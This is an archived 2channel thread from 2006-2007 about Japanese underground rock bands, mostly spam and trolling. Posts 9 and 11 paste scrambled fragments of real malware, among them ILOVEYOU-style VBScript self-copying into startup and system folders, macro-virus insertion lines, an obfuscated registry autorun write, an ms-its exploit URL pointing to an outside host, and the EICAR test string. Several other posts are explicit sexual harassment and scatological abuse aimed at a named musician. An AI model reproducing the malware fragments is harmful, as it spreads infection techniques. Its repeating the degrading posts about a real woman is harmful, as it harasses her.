2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ワッツーシゾンビ/巨人ゆえにデカイ/その他-2-

1 :無名さん:2006/09/20(水) 01:40:14
荒れに荒れた伝説のぶっ壊れロックバンド総合スレッド
ワッツーシ、巨人、ペンペンズ、にせんねん、あふりらんぽ
などなど など。

だいたいわかりますよね

2 :無名さん:2006/09/20(水) 01:43:06
と り あ え ず
ネオ・アンダーグラウンド(笑・くわしくはmixiコミュで)は無視の方向で。
あんな群れてしかものの言えない奴らなんておもろいわけないでしょ


3 :無名さん:2006/09/20(水) 01:51:23
人が集まるまでしばらくはわたし1人議論ということで。
ちなみにidは違いますが、1が携帯でかいてます
もひとつちなみに、ぼくは東京人であります!

なのでSUGOIにいった方、なにかお願いします

4 :無名さん:2006/09/20(水) 01:53:46
でも緑のこと書くと、荒れるんだよねえ…

5 :無名さん:2006/09/20(水) 01:54:33
http://fudge004.sblo.jp/

6 :無名さん:2006/09/20(水) 01:54:58
でも緑のこと書くと、荒れるんだよねえ…

7 :無名さん:2006/09/20(水) 01:55:38
よろしく!↓
http://fudge.in/base.html

8 :無名さん:2006/09/20(水) 02:01:00
うーん、最近この辺どうなのかにゃあ
飽和状態という気もするしねえ

囲くんもパクられちゃったから
ZUINOSINももう見られんからのう

9 :ナカウチ:2006/09/20(水) 02:09:22
http://mixi.jp/show_friend.pl?id=10560

IP:220x151x201x34.ap224.ftth.ucom.ne.jp

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

10 :無名さん:2006/09/20(水) 02:09:40
それでは、おやすみなさい。
朝になったらきっと105くらいまで伸びてるだろうなあ
ウフフ ウフフ

二階堂さんのアルバムはやっぱり良かったですね!
イルリメすごい
ECD嫌い
でも緑のこと書くと、荒れるんだよねえ…

11 :ナカウチ:2006/09/20(水) 02:10:08
http://mixi.jp/show_friend.pl?id=10560

IP:220x151x201x34.ap224.ftth.ucom.ne.jp

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*     
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"     
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)     
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("ml:file://c:\ 
kak.hta';ken=wd+'START
End Sub

12 :ナカウチ:2006/09/20(水) 02:10:40
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      ナカウチ
http://mixi.jp/show_friend.pl?id=10560
IP:220x151x201x34.ap224.ftth.ucom.ne.jp

13 :劔ミキティ:2006/09/20(水) 02:12:33
ミドリのベースの劔樹人です!よろしくおねがいします!
http://mixi.jp/show_friend.pl?id=19809

2ちゃんねるのインディーズ板はぼくたちのものだ!

ぼくたちのホームページです!
http://midori072.com/

ぼくが働いているココルームもよろしくおねがいします!
http://www.kanayo-net.com/cocoroom/

14 :番組の途中ですが名無しです:2006/09/20(水) 02:14:46
後藤まり子のの下痢便おいひーおいひー
ちんこドクドク波うってる!おいひー
いやぁーん、後藤まり子の下痢ですぅ
食べる食べるブリュリュリュビチャビチブフゥ
んっはぁっ!おいひっ!
うぐはぁっ!イグっイグぅぅぅ!
ビチャビチブフゥ

15 : 株価【36】 :2006/09/20(水) 02:16:14
さあ、寝る前の後藤まり子の下痢便直飲みをやらなきゃな。

16 :劔 樹人:2006/09/20(水) 02:17:01
ミドリのベースの劔樹人です!よろしくおねがいします!
http://mixi.jp/show_friend.pl?id=19809

2ちゃんねるのインディーズ板はぼくたちのものだ!

ぼくたちのホームページです!
http://midori072.com/

ぼくが働いているココルームもよろしくおねがいします!
http://www.kanayo-net.com/cocoroom/

17 :坂本 ◆1Jos0RQqmI :2006/09/20(水) 02:21:12
逆さにした後藤まり子の口に水道管突っ込んで、
ケツだけ外に出るようにコンクリートで固めて
下痢飲み場として設置するのもアリだな。

下痢飲みたいときはコンクリートブロックから露出してる
後藤まり子のケツを軽くひっぱたけば下痢が噴出すって寸法だ。

18 :無名さん:2006/09/20(水) 05:49:25
>>1
糞スレ立てんな!
死ね!

19 :ナカウチ:2006/09/20(水) 06:28:30
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
http://mixi.jp/show_friend.pl?id=10560
IP:220x151x201x34.ap224.ftth.ucom.ne.jp

20 :ミドリ親衛隊 ◆/LNwwwwwww :2006/09/20(水) 06:29:24
YO!俺はまり子の肛門生まれ 大腸育ち
臭そうな奴は大体友達 臭そうな奴と大体同じ
スカの道歩き 見てきたこのスレ
下痢便直飲み そう思春期も早々にこれにぞっこんに
まり子のパンツなら置きっぱなしてきた ライブハウスに
まじ観客に迷惑 かけた本当に
だが時はたち 今じゃスレッドのスター そこら中にコピペ
貼る荒らしだ マウスつかんだら まじでNo.1
インディー板代表 トップランカーだ
このチンポ この指に性を授かり まり子の激臭の 下痢便預かり 仲間たち
親たちファンたちに今日も 感謝してカキコする 荒れたまり子スレッド


21 :番組の途中ですが名無しです:2006/09/20(水) 06:33:14
        -=-::.
─-/       \:\     
─ .|  池田先生  ミ:::|   
─ミ|_≡=、´ `, ≡=_、 |;/
─ ||..> .| ̄|. < |─/ヽ < 
─ |ヽ二/  \二/  ∂>
─/.  ハ - −ハ   |_/───‐──────‐∧_∧ ─
. |  ヽ/ヽ/\_ノ  / | ─────────(; ´Д`) >>1
.. \、 ヽ二二/ヽ  / /  \────-─── / .  /─―/ヽ──
.──\i ___ /_/    `ー'"´, -'⌒ヽ──| |  /──/.| | ─
‐――──‐ /∠_,ノ    _/_───‐―──‐| |  /─―/ | |―
────‐ /( ノ ヽ、_/´  \―────‐‐∪ ./──,イ ∪ ─
───‐ 、( 'ノ(     く     `ヽ、 ―──―‐| /−─/|| | ─
──‐‐/` ―\____>\___ノ ────‐|/──/ || | ─
──/───―‐/__〉.───`、__>.―‐―─‐─―‐| || |
─/──‐────────────―−───‐(_)_)─



22 :無名さん:2006/09/20(水) 06:39:31
 このスレ定期的に立つNE!
          ,へ
        \/  ヽ    (  )
.        _/*+*`、    ( )
       <_______フ    )
   _({})   ( ^ω^)    〜
  ノノノ小ヽ   /゙゙゙lll`y─┛
 ( ^ω^)  ノ. ノノ |
 ,ノ゙゙゙゙゙ハヽ、 .`〜rrrrー′
 `〜ェ-ェー'′   |_i|_(_


23 :無名さん:2006/09/20(水) 06:44:35
ペンペンズもにせんねんもあふりらんぽも単独スレあるからこのスレいらんやろ。
>>1削除依頼出しとけよ

24 :劔樹人:2006/09/20(水) 15:55:24
ミドリのベースの劔樹人です!よろしくおねがいします!
http://mixi.jp/show_friend.pl?id=19809

2ちゃんねるのインディーズ板はぼくたちのものだ!

ぼくたちのホームページです!
http://midori072.com/

ぼくが働いているココルームもよろしくおねがいします!
http://www.kanayo-net.com/cocoroom/


25 :ナカウチ:2006/09/20(水) 16:14:35
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!後藤まり子一発ヤらせろ!!
http://mixi.jp/show_friend.pl?id=10560
IP:220x151x201x34.ap224.ftth.ucom.ne.jp

26 :劔樹人:2006/09/20(水) 16:50:36
ミドリのベースの劔樹人です!よろしくおねがいします!
http://mixi.jp/show_friend.pl?id=19809

mixiと2ちゃんねるのインディーズ板はぼくたちのものだ!

ぼくたちのホームページです!
http://midori072.com/

ぼくが働いているココルームもよろしくおねがいします!
ttp://www.kanayo-net.com/cocoroom/

27 : 株価【36】 :2006/09/22(金) 12:05:34
後藤まり子のオナラを一日中吸い込む職業に就きたい。

28 :無名さん:2006/09/25(月) 12:55:42
結局、枡本航太でしょ

29 :劔 樹人:2006/09/25(月) 20:41:25
ミドリのベースの劔樹人です!よろしくおねがいします!
http://mixi.jp/show_friend.pl?id=19809

mixiと2ちゃんねるのインディーズ板はぼくたちのものだ!

ぼくたちのホームページです!
http://midori072.com/

ぼくが働いているココルームもよろしくおねがいします!
ttp://www.kanayo-net.com/cocoroom/


30 :無名さん:2006/09/26(火) 12:58:43
桝本×ピアニカ

31 :無名さん:2006/10/05(木) 02:54:35
枡本ね。
彼の単独スレなくなった?CDいつ出るんかな?

32 :無名さん:2006/10/17(火) 07:44:45
落ちそうですた

33 :無名さん:2006/10/20(金) 23:49:38
チンポーが好きです

34 :無名さん:2006/10/21(土) 02:28:02
枡本さん、二階堂さんとライブするみたいやね!
楽しみやなぁ。

35 :劔 樹人:2006/10/21(土) 03:50:49
2ちゃんねるのインディーズ板はぼくたちのものだ!

ぼくたちのホームページです!
http://midori072.com/

ぼくが働いているココルームもよろしくおねがいします!
ttp://www.kanayo-net.com/cocoroom/

36 :無名さん:2006/10/31(火) 08:21:59
まっさん良いよね!

37 :無名さん:2006/11/07(火) 01:24:20
ズイ休止あたりから勢い無くなったよね。
クッダチクレロ解散やし。
この辺のバンドとはちょっと外れるけどヨルズが好き。

38 :無名さん:2006/11/07(火) 22:44:12
ヨルズいいね!今はブレイクコア勢が人気なんじゃ?

39 :無名さん:2006/11/14(火) 16:50:12
ずい復活きぼんぬ

40 :無名さん:2006/11/27(月) 08:10:01
復活?

41 :無名さん:2006/11/28(火) 07:49:00
ワッツーシさんはまだドラムを客席に的な事をまだやってるん?

42 :無名さん:2006/11/28(火) 19:34:02
やってるやってる〜!!

43 :無名さん:2006/11/28(火) 22:54:17
やらない時ってあるの?

44 :無名さん:2006/11/29(水) 19:25:27
ありますよ。
この前の神戸では1番目だったからかやってなかった。

45 :無名さん:2006/11/30(木) 02:17:47
やらない時もあるのか〜
この前のシェルターの時に満員の中ステージ高いのにわざわざ降ろしてたからどんな時でも毎回やるのかと思った。

46 :無名さん:2006/12/04(月) 05:29:15
だれかワッツーシのギター殺人の夜の歌詞わかる?教えてください

47 :無名さん:2006/12/16(土) 19:20:45
ウィルスの玉手箱にゃ〜〜〜!あはぁ!

48 :無名さん:2006/12/20(水) 08:16:52
ニューアルバムキボンニュプゥ!

49 :無名さん:2007/01/04(木) 07:56:02
誰の?

50 :無名さん:2007/01/04(木) 12:55:48
桝本だろ?

51 :無名さん:2007/01/05(金) 13:23:33
クリトリ

52 :無名さん:2007/01/10(水) 04:06:32
クリトリック・リス最高〜

53 :無名さん:2007/01/18(木) 08:16:20
どんな感じ?

54 :無名さん:2007/01/20(土) 10:25:49
ほぼ裸のおっさんが、飲み屋話風小噺をラップ。下品なECDを想像してもらったら良い

55 :無名さん:2007/01/25(木) 12:02:20
下品なECDってすごい適切ですね。

56 :無名さん:2007/01/25(木) 12:10:42
ちんこはみえますか

57 :無名さん:2007/01/29(月) 13:23:34
>>56
横玉がみえますよ。

巨人がむしょうに見たい。

58 :無名さん:2007/02/09(金) 08:15:33
上げ

59 :無名さん:2007/02/16(金) 08:11:54
ミスターはみきんラッパー

60 :無名さん:2007/02/20(火) 00:57:23
クリトリックリスのマスクかぶってる人は誰ですか?

61 :無名さん:2007/02/20(火) 12:12:28
友達やろ

62 :無名さん:2007/02/20(火) 21:24:24
小人ゆえにチイサイ
ってバンド作りませんか?

63 :無名さん:2007/02/21(水) 23:13:43
巨人ゆえに何がでかいの?

64 :無名さん:2007/02/23(金) 00:24:45
アシッドミー賞A-1サイケデリック初笑い優勝者決定戦
ありがとう(河合石井モタコ)vsスギム(クリトリックリス)2マンの日が決定しました
2007年2月25日(日)
開場 6:00開演 7:00
無料!!!!!!!!!!!!!!!!!!(通常のganja料金 <TC\300+drink代>のみ)当日はganjaから入場acidにて開催>となります
優勝決定戦以外にも
ありがとう(未定)クリトリックリス(未定)その他何かしらのLIVEを予定してます
皆さんのご来場をお待ちしております
PSYCHEDELIC BAR ganja
CLLIUVBE ROOM acid
〒542-0086
大阪市中央区西心斎橋2-9-5日宝三ツ寺会館 3F(06)6211-3804
平日  20:00〜6:00
土日祝 18:00〜6:00
今世紀中無休
地下鉄 御堂筋線心斎橋駅 徒歩5分
地図が見れます
http://phonebook.mobile.yahoo.co.jp/bin/pb?p=%83K%83%93%83W%83%83&a1=27&g1=03&k=
http://itp.ne.jp/aa/KN2700060500332981
>
管理人様大変貴重なスペースありがとうございます
もし ご迷惑 不適切不愉快なようでしたらお手数ですがご削除願います
よろしくお願いします

16 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)